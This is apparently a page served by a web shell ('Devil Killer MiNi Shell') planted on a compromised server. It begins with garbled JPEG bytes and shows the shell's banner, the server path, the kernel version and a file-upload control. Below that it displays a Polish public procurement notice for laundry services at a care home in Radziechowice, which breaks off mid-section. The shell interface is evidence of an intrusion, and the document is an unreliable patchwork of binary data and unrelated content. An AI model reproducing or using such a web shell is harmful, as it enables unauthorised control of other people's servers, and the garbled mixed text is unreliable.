JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240510/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240510/0031928501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pranie odzieży, bielizny i pościeli oraz odzieży ochronnej i roboczej w roku 2024-2025 dla Domu Pomocy Społecznej w Radziechowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ W RADZIECHOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000311740</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wspólna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radziechowice Pierwsze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-561</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">446840821</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">446840821</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@dpsradziechowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.biuletyn.abip.pl/radziechowice</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pranie odzieży, bielizny i pościeli oraz odzieży ochronnej i roboczej w roku 2024-2025 dla Domu Pomocy Społecznej w Radziechowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-556eee62-0eb4-11ef-b4f6-06f4b0c1d0b5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00319285</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00045546/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Pranie odzieży, bielizny i pościeli oraz odzieży ochronnej i roboczej w roku 2024-2025 dla Domu Pomocy Społecznej w Radziechowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-556eee62-0eb4-11ef-b4f6-06f4b0c1d0b5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się środkami komunikacji elektronicznej, przy użyciu Platformy e-Zamówienia, pod adresem https://ezamowienia.gov.pl, Wszelka korespondencja kierowana do Zamawiającego sygnowana jest wskazanym nr referencyjnym sprawy. Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami: Pani Małgorzata Ryszka, tel. 572351905, e-mail: biuro@dpsradziechowice.pl Adres elektronicznej skrzynki podawczej ePUAP: /dpsradziechowice/SkrytkaESP , adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-556eee62-0eb4-11ef-b4f6-06f4b0c1d0b5, Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-556eee62-0eb4-11ef-b4f6-06f4b0c1d0b5, 8.	W przypadkach uniemożliwiających komunikację za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: biuro@dpsradziechowice.pl (nie dotyczy składania ofert)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z wyłączeniem składania ofert o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze”. Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego wraz z wygenerowanym plikiem podpisu lub dokument z wszytym podpisem (typ wewnętrzny). Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na platformie e- Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. Forma złożenia oferty - zgodnie z pkt. XVIII niniejszej SWZ.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. Informacje, oświadczenia lub dokumenty , inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1)	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>2)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”. Brak innej komunikacji niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna o przetwarzaniu danych osobowych stanowi załącznik nr 6 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AG.2301.47.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> IV.	Opis przedmiotu zamówienia. Przedmiotem zamówienia jest: pranie odzieży, bielizny i pościeli w ilości szacunkowej około 32000 kg/rok w tym poszwy, poszewki, prześcieradła, ubrania, koszule, spodnie, swetry, piżamy, bielizna osobista, skarpety, koce, kołdry, poduszki, podkłady, pokrowce, narzuty, zasłony, ścierki, obrusy, ręczniki, firany, itp., w tym ok. 650 kg odzieży ochronnej i roboczej personelu DPS w ramach BHP. Zamawiający zastrzega sobie możliwość zmiany – bez konsekwencji prawnych – ilości zamawianych usług w skali roku w granicach 10%.<br/>1.	Wspólny słownik zamówień: 98310000-9 usługa prania i czyszczenia na sucho 98311000-6 usługa odbierania prania<br/>2.	Usługi pralnicze obejmują:<br/>1)	sortowanie, pranie, suszenie, prasowanie, krochmalenie, maglowanie bielizny i ubrań wraz z dezynfekcją w lokalu spełniającym wymagania sanitarne przewidziane dla usług pralniczych,<br/>2)	czyszczenie chemiczne ubrań - jeżeli zaistnieje taka potrzeba,<br/>3)	odbiór brudnej bielizny z magazynu Zamawiającego oraz zwrot czystej- z podziałem na dział I i dział II oraz przewóz do pralni i z pralni środkiem transportu Wykonawcy przystosowanym do przewozu bielizny z podziałem na strefę brudną i strefę czystą, spełniającym wymagania sanitarne przewidziane dla usług pralniczych,<br/>4)	do wykonywanej usługi pralniczej prowadzona będzie ewidencja ilościowa w kg i asortymentowa przekazanej do prania bielizny i ubrań oraz zdanej po usłudze prania na poszczególne działy na dokumencie Wz w 3-ch egzemplarzach: 1egzemplarz Wykonawca, 1 egzemplarz Zamawiający, 1 egzemplarz po rozliczeniu miesięcznym załączony do faktury zbiorczej,<br/>5)	usługi pralnicze Wykonawca wykonywać będzie zgodnie z wymogami sanitarno- epidemiologicznymi, które obowiązują w pralniach świadczących usługi na rzecz innych podmiotów z zastosowaniem środków piorąco-dezynfekujących o szerokim spektrum działania (skutecznie działających na B, F, S, V, Tbc, SARS-CoV-2) posiadających odpowiednie atesty i certyfikaty. <br/>3.	Wydawana bielizna i pościel odnotowana będzie asortymentowo na kwicie Wz w obecności pracownika Wykonawcy i Zamawiającego. Rzeczy przeznaczone do prania zostaną zapakowane w worki dostarczone przez Wykonawcę,<br/>4.	Przyjęcie wypranej bielizny i pościeli oprócz wyszczególnienia asortymentowego będzie również ważone i odnotowane w postaci ilości przyjętych kilogramów.<br/>5.	Wykonawca po zawarciu umowy winien przedstawić Zamawiającemu atesty na stosowane środki piorące.<br/>6.	Oferta zostanie sporządzona na formularzu oferty, Załącznik Nr 1, który zawiera wartość oferty ogółem przy 32000 kg prania w kwocie netto i brutto oraz cenę netto i brutto za 1kg prania.<br/>7.	Odzież ochronna i robocza pracowników DPS przewożona będzie w stanie rozłożonym na wieszakach. <br/>8.	Wykonawca ponosi pełną odpowiedzialność prawną, materialną za jakość wykonanej usługi oraz zgodność procesu pralniczego z wymogami sanitarnymi. Wymagana jest należyta staranność przy realizacji umowy. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br/>9.	Zamawiający zastrzega sobie prawo przeprowadzenia kontroli wypranej bielizny pod względem czystości, czystości mikrobiologicznej, jakości prasowania.<br/>10.	Sposób przyjmowania bielizny i odzieży brudnej oraz dostarczania bielizny i odzieży czystej: odbiór brudnej odzieży i bielizny odbywać się będzie dwa razy w tygodniu w poniedziałki i czwartki (bądź w inne uzgodnione z Zamawiającym dni) w godzinach 8:00 do 14:00, każdorazowe przekazanie brudnej bielizny musi być potwierdzone pisemnie przez upoważnionych przedstawicieli stron; zwrot odzieży czystej z poprzedniego odbioru odbywa się w dniu kolejnego odbioru odzieży brudnej (z poniedziałku w czwartek, z czwartku w poniedziałek) w przypadku, gdy termin odbioru brudnej odzieży i bielizny przypada w dniu ustawowo wolnym od pracy, odbiór odzieży i bielizny nastąpi w pierwszym dniu roboczym przypadającym po tym dniu. Jeżeli okres dni ustawowo wolnych od pracy jest dłuższy niż 48 godzin, termin wykonania usługi będzie uzgadniany z Wykonawcą indywidualnie. Środki transportu brudnej i czystej bielizny winny być oddzielne lub przegrodzone komorami całkowicie oddzielonymi, w pełni odizolowanymi, z podzielnymi szczelnie zamykanymi drzwiami. W wyjątkowych przypadkach, kiedy transport odbywa się jednym samochodem, najpierw dowożona jest czysta odzież i bielizna, następnie zabierana brudna bielizna. Przed ponownym skierowaniem samochodu z czystą odzieżą i bielizną, winien on być ponownie dezynfekowany. Na wniosek Zamawiającego, Wykonawca zobowiązany jest każdorazowo udostępnić książkę dezynfekcji transportu, którym przewożona jest odzież i bielizna; Wykonawca będzie odpowiadać za przyjęty ładunek brudnej odzieży i bielizny z Domu z chwilą jego pobrania i załadunku; Wykonawca zobowiązany będzie zabezpieczyć ładunek brudnej odzieży i bielizny przed uszkodzeniem, dostępem osób trzecich, wpływem czynników zewnętrznych oraz wpływem ładunku na otoczenie; Wykonawca zabezpieczy Zamawiającego w opakowania do brudnej odzieży i bielizny <br/>11.	Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących co najmniej następujące czynności w zakresie realizacji zamówienia: pranie, maglowanie, prasowanie, suszenie, składanie, sortowanie, pakowanie, na podstawie umowy o pracę w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974r.- Kodeks pracy.<br/>12.	Sposób dokumentowania zatrudnienia osób na podstawie umowy o pracę, uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymogów zatrudnienia na podstawie umowy o pracę oraz rodzaj czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez wykonawcę oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we wzorze umowy stanowiącym załącznik nr 2 do niniejszej SWZ.<br/>13.	Zamawiający zaleca dokonanie wizji przedmiotu zamówienia. W tym celu wykonawcy proszeni są o wcześniejszy kontakt z wyznaczonymi pracownikami Zamawiającego. Wykonawca może zrezygnować z dokonania wizji, ale nie może tym faktem uzasadniać błędnej oceny zakresu zamówienia.<br/>14.	Wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty.<br/>15.	Wyłoniony Wykonawca zobowiązany jest realizować przedmiot zamówienia zgodnie z art. 35 ust 2 pkt.1, art. 36 a i art. 68 ust. 3 ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych ( Dz. U. z 2023 r. poz.875, 1394, 1506, 1681) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98310000-9 - Usługi prania i czyszczenia na sucho</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">98311000-6 - Usługi odbierania prania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-07-09 do 2025-07-08</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryterium: ceny, terminu zapłaty punktacja razem dla dwóch kryteriów 0-100 (100%=100pkt).<br/>Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryterium oceny ofert: cena brutto – 60%, termin zapłaty – 40 %,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin zapłaty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy <br/>1) nie podlegają wykluczeniu <br/>2) spełniają warunki udziału w postępowaniu, dotyczące: <br/>a) zdolności do występowania w obrocie gospodarczym <br/>Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu. <br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej <br/>Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu. <br/>c) sytuacji ekonomicznej lub finansowej <br/>Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu. <br/>d) zdolności technicznej lub zawodowej <br/>Wykonawca spełni warunek jeżeli wykaże, że: posiada odpowiednie doświadczenie gwarantujące należyte wykonanie zamówienia, tj. że wykonał lub wykonuje co najmniej jedną usługę odpowiadającą przedmiotowi niniejszego zamówienia, tj. prania bielizny, odzieży i pościeli - co najmniej 20000 kg w stosunku rocznym w danej umowie, co zostanie wykazane w załączniku nr 7 specyfikacji wraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane lub są wykonywane; dysponuje co najmniej jednym pojazdem przystosowanym do przewozu przedmiotu zamówienia co zostanie wykazane w załączniku nr 8 specyfikacji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane przez Wykonawcę w zakresie braku podstaw wykluczenia, obejmują: <br/>1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (Załącznik nr 5 do SWZ) <br/>2)	wykaz usług wykonanych lub wykonywanych tj. co najmniej jedną usługę odpowiadającą przedmiotowi niniejszego zamówienia prania bielizny, odzieży i pościeli - co najmniej 20000 kg w stosunku rocznym w danej umowie, co zostanie wykazane w załączniku nr 7 specyfikacji wraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane lub są wykonywane.<br/>3)	wykazu pojazdów przeznaczonych do realizacji zamówienia wraz z informacją o podstawie do ich dysponowania ( załącznik nr 8);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w 